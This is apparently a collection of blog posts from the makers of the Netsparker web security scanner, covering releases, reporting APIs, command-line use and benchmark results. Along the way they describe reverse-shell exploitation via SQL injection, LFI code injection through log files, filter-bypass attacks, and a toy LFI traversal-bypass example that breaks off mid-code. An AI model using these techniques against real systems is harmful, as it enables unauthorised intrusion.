
A new vision, a new beta, and a new beginning...


It's quite hard to work on something really good, something that you are proud of, without telling anyone. Now we are over that stage and our new beta has reached more than a hundred people...

Our website is up, our beta feedback forum is alive and now we're blogging. If you don't know what the heck I'm talking about, don't worry, I'll explain.

We've just released a nice beta of our web application security scanner, named "Netsparker". It has been in private beta for the last two years and soon it will be ready for production. Lots of lovely people wanted to get their hands on it before the final release and currently they are enjoying it.

We're not looking for new beta testers, but if you have a good reason to be a beta tester please send us an e-mail and convince us why "you'll be a great beta tester", "report lots of bugs" and "suggest amazing features".

I'm not going to make this post any longer. Subscribe to our RSS feed so you can get informed about future beta releases and details of some new features.

And be prepared for something new...


We solved our name "Dilemma"


Our web application security scanner was code-named "Dilemma". It was a lovely name but we had to part ways.

"Netsparker" is the new name. When you download the latest beta, you'll see lots of visual changes. We re-branded the whole application. It's not Extreme Makeover but you'll notice the changes.

By the way, a new beta is around the corner; we're trying to squeeze in some more features. Sit tight, I'll drop you an e-mail as soon as it's ready.

The Final Beta!


I don't even want to write how much we coded in the last month (actually it's illegal to work that much, so I'm not going to give you any numbers!). It was worth it though.

The latest version of Netsparker... I'm going to put this as adequately as I can "It kicks a**". You can see details in Netsparker changelog but I'll list some highlights, so you can see why it does such a thing:

  • Better performance (less CPU usage, improved HTTP performance and less requests).
  • Ridiculously good SQL injection coverage, I mean really good!
  • Improved Engines: LFI and Command Injection engines improved.
  • New test modules such as "crossdomain.xml", "Apache server-status, server-info", "SVN disclosure", "Find backup files", "TRACE/TRACK check" and some more stuff that you hate to check but have to check.

While you can still join the beta email list, I can't promise anything about getting a beta version soon, as we have enough testers right now.

I'm planning to keep this blog busy by adding some tutorials, videos and insider information. If you are interested in Netsparker, subscribe to the RSS feed, or follow us on Twitter (@netsparker) or FriendFeed (Netsparker). If you are only interested in the release date, you can subscribe to our release newsletter and we'll let you know as soon as it's out.

OWASP AppSec DC 2009


Next week I'll be speaking at AppSec 2009 in Washington DC about "One Click Ownage". This is a very practical way to get a reverse shell, reverse VNC or something like that. Basically after you find an SQL Injection in a MS SQL Server, you can carry out your own payload and run it in the target system by using one HTTP request. There are also other advantages of this such as the ability to exploit SQL Injections via CSRF attacks. 

Finally I'll publish a small tool called WebRaider which allows you to automate the whole attack. All you need to do is type the URL and click the exploit button to get a reverse shell.

I'll be hanging around at the conference between the 11th and 13th. See you over there; if you are attending and fancy a quick chat, drop me an email, ferruh-at-mavitunasecurity.com.

After the conference I'll be in New York for a while, if you are in that area and interested in Netsparker, do not hesitate to contact us so that we can arrange a demonstration in your office.

IstSec 2009


After AppSec DC in Washington DC, this time we are going to IstSec 2009 in Istanbul. IstSec is potentially the biggest security conference in Turkey. Mavituna Security is one of the conference sponsors and most of our team will be there.

I'll give a short talk about "Automation, Application Security and Challenges". If you'll be there as well, don't forget to stop by our booth to say hi.

Netsparker Videos


Product Tour and some feature based videos:

  • Product Tour
  • Simple Scan
  • Getting a Reverse Shell
  • LFI (Local File Inclusion) Exploitation

False Positive Free Scanning


When I tell someone that Netsparker is “False Positive Free”, they’ll stare at me and think “Well, yet another lunatic!” They never actually said that but I can read it from their faces. They won’t say much assuming I’m a mad person who claims a scanner can avoid false positives and since I’m a mad person, I can be dangerous. I assume that’s why they generally choose to be silent after that claim!

Then I ask them a simple question:

“If you can exploit a vulnerability, can that be a false positive?”

Instantly they say “No”, then another 15 seconds of silence before they realise Netsparker actually exploits the identified vulnerabilities to ensure that the vulnerability is not a false positive.

Simply put: “If you can exploit it, it can’t be a false positive.” End of discussion.

Obviously you can’t exploit everything. You can’t exploit and confirm an “internal path leakage” vulnerability without actually compromising the system via another issue. You can’t be sure if the exposed error message is actually something dangerous or just a static text.[i]

However, you can exploit an SQL Injection and confirm that it’s actually an SQL Injection and not just an error page. You can actually confirm LFI by getting files out of the system, you can confirm a Cross-site Scripting issue by executing the injection in a browser and observing JavaScript events, you can confirm a Command Injection by executing code in the system and so on.

So there you go, you can confirm almost all important issues, because all important issues have a clear impact via exploitation. It’s a huge challenge to do this automatically, though. Manually a pen tester can simply figure out the structure of an SQL Injection, but automatically it takes a good engine to figure that out. I’m happy to say that with Netsparker we managed to do this quite successfully.

Now False Positive Free Scanning is Real

Netsparker made false positive free reporting a reality rather than an urban legend. I’m sure other scanners will follow us. We are happy to change the world of automated application security scanning by introducing the first “False Positive Free Web Application Security Scanner”. Also another first is “Integrated Exploitation Engine”. So you get the whole package, crawl, detect, confirm and exploit.

Important Notes

We don’t claim every single issue we report is false positive free. What we claim is that if Netsparker confirms an issue then it’s not a false positive, and we’ll easily confirm 80% or more of the identified issues. If we can’t exploit it, it’ll still be reported as [High] or [Low] possibility depending on the other factors.

If it was a real vulnerability and Netsparker couldn’t confirm it, all you need to do is contact us and we’ll fix it.

There are many issues where it’s not possible to confirm the identified issue hence we do report them as “[Possible]” so the user knows if the vulnerability has been confirmed or not. The beauty of this is that if the report says “Confirmed”, you know you can trust it. Don’t believe it? Use the integrated exploitation panels to exploit the vulnerability yourself. Generally it only takes two clicks.


[i] Although you can guess based on some indicators: if the HTTP status is 500, there is a higher possibility that it’s not a false positive. Hence Netsparker will report issues as [High Possibility] or [Low Possibility] based on similar indicators.

Monthly Round-Up


Netsparker New Release v1.1.2.3


We released a new version of Netsparker, mostly improvements and bug fixes.

Use “Help > Check Updates” to get the latest version.

What’s new?

  • Encoder
    We added a new panel called “Encoder” which allows you to encode and decode the entered data in various encodings; we also added a couple of common hashing algorithms.
    During a web assessment, whether for attacking or just for analysing, you can use this tool quickly.

    [Screenshot: Netsparker Encoders]
  • Custom Reporting API
    Now, Custom Reporting API documentation comes with the new installer. We also updated the sample XML report. I’ll write more about custom reports in the blog.

New Confirmation Engines

In this release we focused on confirmation engines and tried to ship all of them, so you will see far fewer “[High Possibility]” issues and you can keep your report false positive free.

Remote Code Evaluation (RCE) Confirmation Engine Added
Now, Netsparker can confirm RCE issues.

Code Injection (CI) via LFI (Local File Inclusion) Confirmation Added
An attacker can use an LFI vulnerability and local resources (such as Apache error logs) or “/proc/*” tricks to inject a piece of PHP code and then include and execute it.
This is not new, but now Netsparker can confirm the PHP execution as well.

Improvements

  • Fewer requests in SQL Injection engines. We tried to optimise the SQL Injection and Command Injection engines. They should produce about 15% fewer requests.
  • SQL Injection engine now has a light scan option. This will disable checks for Boolean/Blind SQL Injection with 2 groups. However, it'll speed up the scan. LightScan is enabled by default. You can disable it by setting "Advanced Settings > LightSQLInjectionChecks" to "False".
  • Less CPU usage during passive analysis
  • Coverage improved. Netsparker will try to access the website without cookie support to find the special “Your browser doesn’t support cookies” page.
  • Mod_Negotiation engine updated. Now Netsparker has far smarter checks to identify Mod_Negotiation issues.
  • Cross-site scripting issues are now reported with alert() proof of concepts

Bug Fixes and Other Stuff

  • Parsing issues with some relative links addressed. This was affecting links beginning with a question mark (?) without a path.
  • Extra "&" characters in some GET requests fixed.
  • Some SQL Injection attacks constructed correctly to bypass weak blacklisting and filters.
  • An encoding problem addressed in SQL Injection exploitation. This was causing Netsparker not to encode the user's input in SQL Injection which works with POST.
  • Other minor fixes.

Custom Reporting API

[Screenshot: Netsparker Custom Report Sample]

I’ll try to write a new tip or tutorial every week in here. Let’s start with Netsparker’s custom reporting API.

How does it work?

During the startup of Netsparker, it scans for C# code files (*.cs) in the "ReportTemplates" directory located under Netsparker's installation directory. Every identified file will be visible in the "Reporting" menu as a custom report.

Scripting Language

Netsparker’s scripting language is C#. Even if you haven’t coded in C# before, it shouldn’t be a problem. It’s pretty easy to make simple changes.

Here is a sample custom report:

<%@ Assembly Name="MSL.Project" %>
<%@ Assembly Name="MSL.Interfaces" %>
<%@ Assembly Name="MSL.Shared" %>
<%@ Import NameSpace="FM.Dilemma" %>
<%@ Import NameSpace="System.Collections" %>
<%@ Import NameSpace="System.Collections.Generic" %>
<%@ Import NameSpace="System.Security" %>
<%@ Argument Name="vulns" Type="Array" %>
<%@ Argument Name="settings" Type="ScanSettings" %>
<?xml version="1.0" encoding="utf-8" ?>
<netsparker generated="<%=DateTime.Now.ToString()%>">

    <target>
        <url><%=SecurityElement.Escape(settings.Uri.ToString())%></url>
    </target>

<%
foreach(Vulnerability vuln in vulns){
%>
    <vulnerability confirmed="<%=vuln.Confirmed.ToString()%>">
        <url><%=SecurityElement.Escape(vuln.RequestUri.ToString())%></url>
        <type><%=vuln.Type%></type>
        <severity><%=vuln.ExtendedType.Severity.ToString()%></severity>
        <vulnerableparametertype><%=SecurityElement.Escape(vuln.UriManager.AttackParameter.Type.ToString())%></vulnerableparametertype>
        <vulnerableparameter><%=SecurityElement.Escape(vuln.UriManager.AttackParameter.Name)%></vulnerableparameter>
        <vulnerableparametervalue><%=SecurityElement.Escape(vuln.UriManager.AttackParameter.Value)%></vulnerableparametervalue>

        <rawrequest><%=SecurityElement.Escape(vuln.RawRequest)%></rawrequest>
        <rawresponse><%=SecurityElement.Escape(vuln.RawResponse)%></rawresponse>

        <extrainformation>
        <%
            foreach(KeyValuePair<string, CustomField> cField in vuln.CustomFields){
        %>
            <info name="<%=cField.Key%>"><%=SecurityElement.Escape(cField.Value.Value)%></info>
        <%
            }
        %>
        </extrainformation>
    </vulnerability>

<%
}
%>
</netsparker>

This will generate an XML file which includes:

  • All vulnerabilities
  • Vulnerable Parameter and type (GET/POST)
  • Vulnerability Details
  • Confirmation Status
  • Extra exploitation data
  • Scan time
  • Vulnerability severity etc...

You can add more details into the reports or customise them as much as you want.

Documentation

You can find MSDN style API documentation under the “ReportTemplates” directory, in the file “NetsparkerReportingAPI.chm”.

Defining the extension of the report

The name of the “.cs” file will be visible under the “Reporting” menu, and when the user clicks it, the generated report will use the extension from the custom report file name.

For example:

  • “Vulnerabilities List (XML).xml.cs” - File extension will be “xml”
  • “Vulnerabilities List (XML).html.cs” - File extension will be “html”

Testing the code

You don’t need to restart Netsparker every time you change the source code of your report. Once Netsparker has added it to the report menu, all you need to do is run it again. If it fails to compile it’ll let you know with an error message.

Sample Code

A sample report called “Vulnerabilities List (XML).xml.cs” ships with Netsparker; it is a simple report that generates an XML report with all identified vulnerabilities.

Support

If you need any help just send us an email or give us a ring, we’ll be happy to help you out.

Security

The reporting engine runs with the current user’s privileges, and a custom report is ordinary C# code that is compiled and executed, so it can do anything that user can do. Don’t run a report unless you trust the author of the custom report code.

Integrating Netsparker with your WAF


Denim Group has released Vulnerability Manager, in their own words:

Denim Group's Vulnerability Manager allows security teams to import and consolidate application-level vulnerabilities, automatically generate virtual patches, monitor attack attempts, communicate with defect tracking systems, and evaluate team maturity. Because this is done in a centralized system, application security managers have greatly increased visibility into and control of these processes, and they are collecting data that can be used to support sophisticated conversations with their managers and executives.

This is great for Netsparker users because Vulnerability Manager can import Netsparker XML reports. Since Netsparker confirms the identified vulnerabilities and marks them as confirmed in the XML output, you can generate WAF rules or send the identified vulnerabilities to the related defect tracking system without checking for false positives. You can even automate the whole process: you don’t need a person to check the vulnerabilities before deploying the patches.
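As an added example (not Netsparker’s or Denim Group’s code), here is a small Python consumer for a report in the shape the sample “Vulnerabilities List (XML).xml.cs” template produces: it parses the XML, sends confirmed issues to an automation queue and unconfirmed ones to manual review, and orders them by severity with confirmed issues first. The report text and the severity names are constructed.

```python
"""Triage a Netsparker XML report of the shape written by the sample
"Vulnerabilities List (XML).xml.cs" template. Added example, not Netsparker's
own code; the report below is constructed and the severity names are assumed."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# The template escapes text with SecurityElement.Escape, so quotes and angle
# brackets arrive as XML entities; ElementTree decodes them for us.
SAMPLE_REPORT = """<?xml version="1.0" encoding="utf-8" ?>
<netsparker generated="02/15/2010 23:10:41">
    <target>
        <url>http://nightlybuild.example.com/</url>
    </target>
    <vulnerability confirmed="False">
        <url>http://nightlybuild.example.com/search.php?q=x</url>
        <type>[Possible] Internal Path Disclosure</type>
        <severity>Low</severity>
        <vulnerableparametertype>GET</vulnerableparametertype>
        <vulnerableparameter>q</vulnerableparameter>
        <vulnerableparametervalue>x</vulnerableparametervalue>
        <extrainformation/>
    </vulnerability>
    <vulnerability confirmed="True">
        <url>http://nightlybuild.example.com/products.php?id=1</url>
        <type>SQL Injection</type>
        <severity>High</severity>
        <vulnerableparametertype>GET</vulnerableparametertype>
        <vulnerableparameter>id</vulnerableparameter>
        <vulnerableparametervalue>1&apos;</vulnerableparametervalue>
        <rawrequest>GET /products.php?id=1&apos; HTTP/1.1</rawrequest>
        <rawresponse>HTTP/1.1 500 Internal Server Error</rawresponse>
        <extrainformation>
            <info name="DatabaseType">MySQL</info>
        </extrainformation>
    </vulnerability>
    <vulnerability confirmed="False">
        <url>http://nightlybuild.example.com/login.php</url>
        <type>[Possible] SQL Injection</type>
        <severity>High</severity>
        <vulnerableparametertype>POST</vulnerableparametertype>
        <vulnerableparameter>user</vulnerableparameter>
        <vulnerableparametervalue>admin</vulnerableparametervalue>
        <extrainformation/>
    </vulnerability>
</netsparker>
"""

SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}  # assumed ordering


@dataclass
class Finding:
    url: str
    issue_type: str
    severity: str
    confirmed: bool
    parameter: str
    parameter_type: str
    extra: dict = field(default_factory=dict)


def parse_report(xml_text: str) -> list:
    """Read every <vulnerability>. confirmed="True"/"False" comes from C#
    Boolean.ToString(), so compare case-insensitively instead of by exact text."""
    root = ET.fromstring(xml_text)
    findings = []
    for v in root.iter("vulnerability"):
        extra = {i.get("name", ""): (i.text or "") for i in v.iter("info")}
        findings.append(Finding(
            url=v.findtext("url", default=""),
            issue_type=v.findtext("type", default=""),
            severity=v.findtext("severity", default=""),
            confirmed=v.get("confirmed", "False").strip().lower() == "true",
            parameter=v.findtext("vulnerableparameter", default=""),
            parameter_type=v.findtext("vulnerableparametertype", default=""),
            extra=extra,
        ))
    return findings


def sort_findings(findings: list) -> list:
    """Highest severity first; within one severity, confirmed before [Possible]."""
    return sorted(findings, key=lambda f: (SEVERITY_RANK.get(f.severity, 99), not f.confirmed))


def triage(findings: list) -> tuple:
    """Confirmed issues can feed a WAF rule or a ticket unreviewed; unconfirmed
    ones still need a human to decide whether they are false positives."""
    automate = [f for f in findings if f.confirmed]
    review = [f for f in findings if not f.confirmed]
    return automate, review


def confirmation_rate(findings: list) -> float:
    """Share of reported issues the scanner confirmed (0.0 for an empty report)."""
    return sum(f.confirmed for f in findings) / len(findings) if findings else 0.0
```

Call parse_report() on the text of a report written with /rt "Vulnerabilities List (XML)", then triage() and sort_findings() on the result; the SAMPLE_REPORT constant stands in for that file here.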

The tech preview release demo of Vulnerability Manager:

Netsparker - "Automate That" Release v1.1.5.0057


Netsparker’s new “Automate That” [1] release is ready. It’s not just about bug fixes or improvements; we’ve also got two great new features and two big improvements: Command Line Support, to automate and integrate your scans with other tools, and Schedule Support, so that you can scan stuff overnight or scan your application weekly and obtain reports. We decreased the request count during the attacking phase without sacrificing our coverage and added a bunch of new confirmation engines.

[Screenshot: Schedule Support]

Schedule Support

One of the most requested features was Scheduling Support, and we’ve finally added it. It doesn’t require an extra service to be installed and integrates itself with the “Windows Task Scheduler”. It works correctly under Windows XP, Windows 2003, Windows Vista and Windows 7.

Command Line Support

The command line can be used to call Netsparker from another application for manual scanning. For example, internally we’ve got a Firefox test extension which launches Netsparker with the current page’s URL by using the following command line:

Netsparker.exe /u [Current Page]

If you want to automate the whole scan, the best way to do it is to create a new profile from the “Start New Scan” window. Afterwards you can launch a new scan with your profile name. You can share these profiles between computers; they are stored in "My Documents\Netsparker Scans\Profiles".

Netsparker.exe /a /p QuickSQLI /u http://nightlybuild.example.com /rt "Vulnerabilities List (XML)" /r c:\reports\report-%date%-%time%.xml

This will scan the URL with the given profile and save the XML report to the c:\reports\ folder. %date% and %time% will be dynamically replaced with the start date and time of the scan, so you don’t have to change the report name every time you run it. If you need custom output you can create your own report with Netsparker’s Custom Reporting API.

Command Line Parameters:

  • /a, /auto - When the other parameters are given correctly, the scan is carried out, the report is saved and the program is closed.
  • /p, /profile - Name of the profile to be used during the scan. If not specified, the preset profile will be used.
  • /u, /url - Address of the website to be scanned. If the profile includes a different website address, the address given with this parameter takes precedence.
  • /pr, /proxy - Proxy server address. If the profile includes a different proxy server address, the address given with this parameter takes precedence. A valid proxy server address looks like http://user:password@proxy.address/; if a user name and password are required to log on to the proxy server, give them in this format.
  • /r, /report - File path the report will be saved to. It should be used in conjunction with the “/a” parameter. The full physical file path can be given; if only a file name is given, the created report will be saved into the folder the command is run from.
  • /rf, /reportformat - File format of the created report. If not specified, the report is created in “pdf” format; rtf, pdf, text, csv, xls and html formats are also supported.
  • /rt, /reporttemplate - Type of the created report. If not specified, the first type in the list will be used.

Performance Improvements

  • Number of requests to identify vulnerabilities drastically decreased. We optimised all of our attacks and combined some attacks into one; in the end we send 35% fewer requests, and by decreasing the number of requests we opened some space to make our coverage even better. This means a shorter attacking phase.
  • Smart caching added to some detection engines to decrease CPU usage. If you have a powerful system you might not notice this at all. It’s an increase of about 2-3%.

[Screenshot: ViewState Panel]

New Security Checks

  • ASP.NET ViewState analysis added
    • ViewState is not signed
    • ViewState is not encrypted
    • ViewState view panel. When you go to “HTTP Request/Response”, if the page has ViewState in it, this panel will be visible automatically. If the ViewState is not encrypted, then you can see the data in it.

New Confirmation Engines

Confirmation engines ensure that you won’t have a false positive and you will see fewer [Possible] vulnerabilities. When these vulnerabilities get confirmed you’ll see Netsparker’s famous “Confirmed” icon!

  • RCE (Remote Code Evaluation) confirmation engine added.
  • RFI (Remote File Inclusion) confirmation engine added.
  • Command (Remote File Inclusion) confirmation engine added.

Improvements

  • Cross-site scripting engine updated. The new engine is faster and produces fewer possible errors, and it also allowed us to add more XSS checks. However, there are some missing bits in the new engine, which might cause it to miss some rare XSS cases. We are working on this problem.
  • Permanent XSS detection improved. Currently there is no Confirmation engine for permanent XSS checks. We're working on this problem.
  • Start new scan screen remembers the last used profile.
  • Extra confirmation stage added to dashboard. Extra confirmation is triggered for some Blind SQL Injection issues. It's a required step to avoid false positives, although it can take minutes depending on the vulnerability.
  • Better coverage in many engines but mostly SQL Injection (new ORACLE, MySQL and SQL Server attacks added and optimised to work in more cases)
  • Cross-site scripting issues now reported with alert() proof of concepts for easier copy & paste
  • We added new default profiles. You can always create your own custom profiles.
    • Full Scan – SQL Server (checks for everything but SQL Injection attacks optimised for SQL Server backend database which makes the scan faster)
    • Full Scan – MySQL (checks for everything but SQL Injection attacks optimised for MySQL backend database which makes the scan faster)
    • Fast – No JavaScript (checks for everything but Netsparker won’t parse / interpret JavaScript, which speeds up the scan, especially the crawling phase)

Bug Fixes

  • A bug fixed in the JavaScript parser which was causing consistent crashes in some AJAX cases
  • Parsing issues for some relative links addressed. It was affecting links starting with a question mark (?) without a path.
  • Some SQL Injection attacks constructed correctly to bypass weak blacklisting and filters.
  • An issue in dashboard causing display of incorrect figures in some scans addressed.
  • A parsing bug addressed in pages with external JavaScript references
  • The bug in the "[Possible] Source Code Disclosure" vulnerability addressed.
  • A problem in Configure Authentication Tab addressed. This problem was affecting logout views with heavy JavaScript.
  • There were some problems in Blind SQL Injection detection in ORACLE. Those issues were addressed; now Blind SQL Injection works correctly even with many grouped ORACLE SQL queries.
  • Null byte reporting in the XML file was addressed, which was causing problems in XML parsers. Currently all reported URLs are encoded correctly in the report.
  • Issues weren't sorted correctly. Confirmed issues were listed after possible issues in the same severity.
  • A bug addressed which was causing cookie save checkbox to be kept enabled in the profile save dialog.

[1] All alpha / beta releases of Netsparker had a release code name. Generally with a cheesy reference such as “Fast & Furious” Release, “So tell the girls I’m back in town” Release, “Getting There” Release. It was fun. We thought it’d be nice to give a code name to our public releases as well.

Netsparker - "Smart Casual" Release v1.1.5.89


Apparently we are much better at writing code than writing blog posts! We have released v1.1.5.0089, 2 days ago.

This is a small update, mainly addressing some minor bugs and the lack of a software manual.

  • Improvements
    • Confirmation stages added to Dashboard
    • Help Documentation added to installer. You can access it from the “Help” menu or you can press F1.
    • Error Based SQL Injection support for Postgres added
  • Bug Fixes
    • One character limit bug in SQL Injection exploitation panel addressed
    • Netsparker Blog link added to Help menu
    • A bug in internal path disclosure addressed. The bug was causing some issues to be missed.
    • Merge scan was causing old issues to be lost from the issues panel during loading and new scans.
    • Incorrect figures in dashboard during the Recrawling phase issue addressed.
    • Some messagebox skins corrected to match the Netsparker’s main skin
    • Scope problems in XML HTTP Requests analysed by the JavaScript parser addressed. Now the JavaScript parser correctly obeys include/exclude rules and scan scope.
    • Licence Loader skin changed to native for Windows 7/Vista


You can use “Help > Check Updates” to update Netsparker.

Netsparker, Accuracy and Time Costs of Web Application Security Scanner Report


Ha.ckers blog published Larry’s new report: “Accuracy and Time Costs of Web Application Security Scanner Report”.

Unfortunately Larry never contacted us, so we didn’t know that he was doing such a test. However, as soon as the report was out we conducted the very same test, as the methodology was straightforward.

We also sent an email to Larry and offered him a fully-functional trial version to conduct the test as well. Anyone with a full or demo version of Netsparker can repeat these tests easily.

How did we conduct the test?

  • We used the last public version of Netsparker 1.1.5.87
  • We have not trained the scanner other than changing the start URL of the scans.
  • We attached the save files, Netsparker database and XML reports, so you can see the results for yourself. If you don’t have Netsparker then you can take a look at our XML reports. Download reports and save files.
  • We considered [High Possible] vulnerabilities as vulnerable; if a [High Possible] vulnerability was not correct, it was counted as a False Positive, although all [High Possible] issues were correct.

This is the overall output:

Two charts exactly like Larry’s report; we added Netsparker to the results.

[Chart: Overall]

As you can see, after NTO Spider, Netsparker is the best scanner when “Trained” and the second best scanner in “Point and Shoot”, right after NTO and IBM AppScan.

False-Positive Free Scanning

We delivered what we claimed and the report was false-positive free.

The 1.1.5.87 release had some LFI bugs which have already been addressed and will be deployed in the next release. These caused [High Possible] LFI vulnerabilities. None of them were confirmed (obviously!) but it was quite irritating; for full disclosure I wanted to point that out clearly. We spotted some unconfirmed possible LFI issues in all Permanent XSS locations. Since we considered [High Possible] as vulnerable, we’ll consider these as False Positives. We addressed this problem in v1.1.5.91; use “Help > Check Update” to update Netsparker.

[Chart: FP and FN]

Training Time

Actually Netsparker doesn’t have many training options because it doesn’t require any. It picks up many URL rewrites automatically, it detects custom 404s on the fly, and 99% of the time you don’t need to tweak it. It just works. In this case all we did was change the start URL of the scan, so our training time was somewhere between a second and a minute, depending on how fast we can copy & paste a URL.

[Chart: Training Time]

Overall Human Time/Cost

Larry calculated the overall human time/cost with the following formula:

Training time + (# False Positives * 15min) + (# False Negatives * 15min)

This is the original chart (in minutes, lower is better):

[Chart: Overall Human Time Cost]

However, since none of the other scanners in the test has a confirmation engine like Netsparker’s, he overlooked the fact that even when the reported issues are not false positives you still have to analyse them; otherwise you wouldn’t know whether they are false positives or not.

This is not an issue with Netsparker as we can confirm vulnerabilities. Out of 103 identified vulnerabilities we confirmed 87 of them, so we confirmed 84% of all identified issues. This could’ve been much higher if the test websites were using MySQL, ORACLE or MS SQL or even Postgres (we have limited support) instead of MS Access. I’ll discuss this further at the end of this post.

So I’ve revised Larry’s formula and made it more realistic by adding one more criterion: the time to confirm that a vulnerability is not a false positive. 15 minutes would have been harsh as some issues could be really obvious, so I used 3 minutes per identified vulnerability, which is quite naive.

Revised Formula:

Training time + (# False Positives * 15min) + (# False Negatives * 15min) + (# Identified non-FP Vulnerabilities * 3min)

Updated and more realistic results (in minutes, lower is better):

[Chart: Overall Human Time Cost (realistic)]

Netsparker identified 5 new vulnerabilities that other scanners missed

Netsparker identified 7 new vulnerabilities that all of the other scanners missed:

  • NTO Webscantest
    • URL Based XSS in /datastore/search_get_by_id.php and in many other URLs
    • XSS in “method” parameter in /soap/wsdlclient12.php
  • Acunetix testPHP
    • XSS in “uphone” parameter in “/userinfo.php”
  • Cenzic Crackme
    • Permanent XSS in /kelev/php/loanrequestlist.php
    • Permanent XSS in /kelev/php/approveloanpage.php

UPDATE: 2 of the issues removed from zero.webappsecurity.com because they were duplicates, we didn’t notice it in the first analysis. 

A Funny Vulnerability(!)

We observed that Netsparker missed a remote code evaluation vulnerability according to Larry’s results.

I don’t know how Larry confirmed all vulnerabilities but this is certainly not exploitable :)

From “http://testphp.acunetix.com/comment.php” and “phpaction” parameter.

if ($_POST["phpaction"] == "printf(md5(acunetix_wvs_security_test));exit;//") eval($_POST["phpaction"]);

So it’s not actually a vulnerability; it’s just a PoC vulnerability to demonstrate Acunetix’s related checks.

UPDATE: I want to make it clear that this is obviously not intentional code to block other scanners. This is just a test page for the Acunetix scanner for their customers and demo versions, which makes a lot of sense. All I wanted to point out is that this issue should be excluded from the test, and leaving such an issue in the report might raise questions about other issues. I’m not quite sure if there are any other issues like this in the report as we haven’t investigated every single one of them. My apologies to our friends at Acunetix if I seemed to be accusing them; that definitely wasn’t my intention.

What Did Netsparker Miss, and Why?

  • Netsparker missed some XSS vulnerabilities in forms. Netsparker filled in everything correctly, which means it missed the cross-site scripting issues in validation pages because it never saw the validation pages at all. This issue was on our list and we’ll try to address it as soon as possible.
  • Netsparker missed some error message information disclosure issues, because they are so prone to false positives. In the real world, reporting such issues would cause a lot of false positives. Netsparker missed about 6 error message issues. Just to be clear, Netsparker reports debugging related information, but these pages were barely leaking any debug related information, hence Netsparker didn’t report them.
  • Couldn’t confirm or missed MS Access SQL Injections. Netsparker engines are specifically designed for ORACLE, MS SQL and MySQL. Currently we are in the process of adding Postgres and will eventually add support for all popular DBMSes. Basically, if you changed the MS Access backend of all these systems to ORACLE, MySQL or MS SQL, Netsparker would find and confirm those vulnerabilities. Obviously this is not an excuse to miss a vulnerability and we’re trying to do our best to add these new database engines. Netsparker was especially bad on IBM AppScan’s testfire website due to this problem.
  • Netsparker missed all attacks based on HTTP headers or cookies because it doesn’t currently support them. This is a known limitation; it’s on our roadmap and will be addressed.

Conclusions

We were expecting good results and we got them, although I still think Netsparker would have performed better in more realistic scenarios. For example, I didn't notice a single fully blind (time-based) SQL Injection vulnerability in the whole test.

One of the most unrealistic things about the test is how little room the test websites leave for false positives. If you haven't used any of these scanners, just ask anyone who has and they'll tell you that they definitely report more than 2-3% false-positive issues in every scan.

The report proves that Netsparker's confirmation and false-positive-free scanning feature is a real time saver.

Download Test Files and XML Reports

Do you want to test it too?

You can request a demo and try Netsparker's fully functional evaluation version.

Monthly Round-Up, February

It was a good month; here is a quick overview:

What’s Next

(Screenshot: the new Netsparker Settings interface)
  • Some of our users were having memory-related issues with big websites (more than 100K requests). We addressed this problem; Netsparker's memory footprint is now much lower and it can send more than a couple of million requests without a problem. We are still testing these changes and will release them soon.
  • We added a new settings interface. Looks nice, doesn't it?
  • We are working on a couple of other things and will post about them soon.

Subscribe to our RSS feed or follow us on Twitter for updates.


Netsparker 1.3.0.0 - "All you can scan" Release

We've been frantically working on the new version of Netsparker. We addressed lots of minor issues, added some new features, improved many of the engines and, most importantly, fixed all memory-related problems.

Better memory management

We received some bug reports that users were getting "Out of Memory" exceptions on big websites. Yes, almost all other web application security scanners crash on big websites; that might be acceptable for them, but not for us.

So we fixed all memory-related problems. It doesn't matter how big the HTTP response is, 10kB or 4096kB, and it doesn't matter whether Netsparker needs to send 100 requests or 2 million; it will work just fine and won't cost you more than 300MB of memory. You might still experience some problems if you need to send more than 5 million requests, due to our storage and optimisation design, but I'm pretty sure 5 million attacks will cover almost all websites, and when in doubt you can always scan folders separately and let Netsparker merge the scan results via "File > Open".

(Screenshot: Permanent XSS report)

Permanent/Stored Cross-site Scripting Improvements

We improved the detection and reporting of Permanent Cross-site Scripting issues. Now you can see the details of the injection request as well as the output point, so you can easily spot the vulnerable location.

Unfortunately the Permanent XSS engine doesn't support confirmation yet, but we are working on it.

Better Cross-site Scripting (XSS) Confirmation Engine

As you know, Netsparker is the first and only scanner which can confirm vulnerabilities to eliminate false positives. We massively improved confirmation in the XSS engine to provide one-click proofs of concept to our users. The confirmation engine now tries the simplest XSS exploit first, before moving on to more obscure ones.

Some attacks were revised and many attacks to bypass WAFs/IDSs were added.

New Settings Interface

Even though Netsparker tries to do everything for you (detecting URL rewrites, custom 404 page patterns, the best exploitation speed, etc.), sometimes you want to go into the details and fine-tune the settings for a web application test.

Our previous settings interface was hideous, so we replaced it with a new shiny one:

(Screenshot: the new Netsparker Settings interface)

Netsparker still hides some advanced settings, as 99% of users don't really need to change them. However, if you are really curious and know what you are doing, you can hold the "Ctrl" key while clicking "File > Settings > Settings" to get the advanced, and still "hideous", settings interface.

If you mess up the configuration, go to "Settings" and click "Reset Settings".

JavaScript parser issues

We received bug reports that NetsparkerHelper was crashing on some websites. These issues have been addressed and a fail-safe check has been added to NetsparkerHelper: it now recovers silently, so your scan can continue as it's supposed to even when something unexpected happens.

Local File Inclusion (LFI) Engine Improvement

LFI is still a common and dangerous vulnerability. We fixed some problems in the confirmation engine; it wasn't confirming some LFI vulnerabilities on *nix systems.

We added new attacks to bypass blacklisting filters and IDS/WAFs. Exploitation has been improved and many minor bugs addressed.
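To show what "confirming" an LFI on a *nix target and "bypassing a blacklisting filter" mean in practice, here is an added example written for this page (not Netsparker's engine). The target is constructed: `vulnerable_include`, `FAKE_FS` and `WEBROOT` are invented stand-ins for a page-include parameter that strips `../` in a single pass. The scanner side generates traversal variants from the plain form through single-pass-strip and encoding bypasses, and reports a finding only when the response matches a signature of the requested file, which is what separates a confirmed LFI from a guess:

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed stand-in for a vulnerable target (example code, not Netsparker's engine):
# a page include that strips "../" once and serves files from a fake filesystem.
FAKE_FS = {
    "/var/www/pages/home.php": "<h1>Home</h1>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
}
WEBROOT = "/var/www/pages/"


def vulnerable_include(page_param):
    # The web server URL-decodes once; the application then removes "../" in a
    # single pass. "....//" collapses to "../" after that one removal, which is
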